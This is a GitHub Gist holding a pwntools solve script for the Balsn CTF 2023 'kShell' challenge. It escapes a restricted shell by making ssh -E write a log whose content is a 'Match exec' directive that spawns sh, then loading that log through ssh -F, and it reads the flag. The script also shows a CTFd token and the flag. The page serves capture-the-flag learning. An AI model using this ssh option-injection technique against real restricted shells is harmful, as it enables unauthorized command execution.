Created
October 7, 2023 08:25
-
-
Save lebr0nli/14b59e8e66c50aa0ff172640d1bb1727 to your computer and use it in GitHub Desktop.
Balsn CTF 2023 - kShell (Misc)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
import secrets | |
TOKEN = b"ctfd_7aecfde25ac2e3bb7174f6521d3e2e5be0451c0e061db725f66ddbb2cac3738e" | |
_, HOST, PORT = "nc kshell.balsnctf.com 7122".split() | |
with remote(HOST, PORT) as io: | |
io.sendline(TOKEN) | |
token = secrets.token_hex(16) | |
io.sendlineafter( | |
b"kshell~$", | |
f""" | |
ssh -E 'Match exec "sh 0<&2 1>&2" #{token}' x | |
""".strip().encode(), | |
) | |
io.sendlineafter( | |
b"kshell~$", | |
f""" | |
ssh -F 'Match exec "sh 0<&2 1>&2" #{token}' -E {token} x | |
""".strip().encode(), | |
) | |
io.sendlineafter( | |
b"kshell~$", | |
f""" | |
ssh -F {token} x | |
""".strip().encode(), | |
) | |
io.sendline(b"/readflag") | |
io.interactive() | |
io.sendline(b"exit") | |
# PWNLIB_NOTERM=1 python solve.py | |
# BALSN{h0w_d1d_u_g3t_RCE_on_my_kSSHell??} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment